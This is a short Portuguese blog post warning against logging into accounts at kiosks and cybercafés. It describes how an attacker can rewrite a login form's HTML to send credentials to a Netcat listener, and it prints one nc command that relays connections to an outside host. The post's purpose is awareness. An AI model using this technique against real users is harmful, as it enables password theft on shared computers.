Skip to content
Jaccon
  • Home
  • Biografia
  • Github
  • Imasters
  • Entrevistas
  • Arquivo
  • Contato
Menu

O perigo de usar internet em Kiosques e Cybercafes

André Jaccon
Tech Lead Mobsale Payments & E-commerce

Eu mantenho este trabalho de forma voluntária e sem fins lucrativos desde 2003. Se puder siga-me nas redes sociais

Linkedin
Github
Youtube
Facebook
Twitter
LinkedIn
Email
Print
WhatsApp

Faça parte das comunidades que eu participo no Telegram e Discor.

Participar

Este post têm como objetivo a instruir pessoas a não utilizar a internet logando em seus serviços de e-mails, redes sociais etc pois o risco é grande. Um usuário mal intencionado pode roubar suas informações sem sequer precisar de exploits, sniffers ou arp spoofing ele usará apenas o Netcat

A técnica mencionada aqui é simples, um usuário mal intencionado habilita em sua máquina para que escute de pacotes enviados pelo computador cobaia simulando a porta 80 ( HTTP ) e altero o formulário de login do serviço web para que mande esta solicitação para esta nova conexão alterando o source do HTML da página.

Quando um usuário entrar com o login e senha ele enviará automáticamente as informações para o computador do usuário mal intencionado

Entendendo:
nc -l 192.168.1.100 8080 --sh-exec "ncat sincronicx.com 80"

192.168.1.100 -> IP no qual irá escutar as conexões na porta 8080 simulando um servidor WEB

Entenda o funcionamento nos screenshots abaixo:
Screen Shot 2014-07-18 at 7.11.08 PM

Screen Shot 2014-07-18 at 7.11.42 PM

André Jaccon Tech Lead
© Copyleft - André Jaccon Tech lead
Search for:
Fechar Menu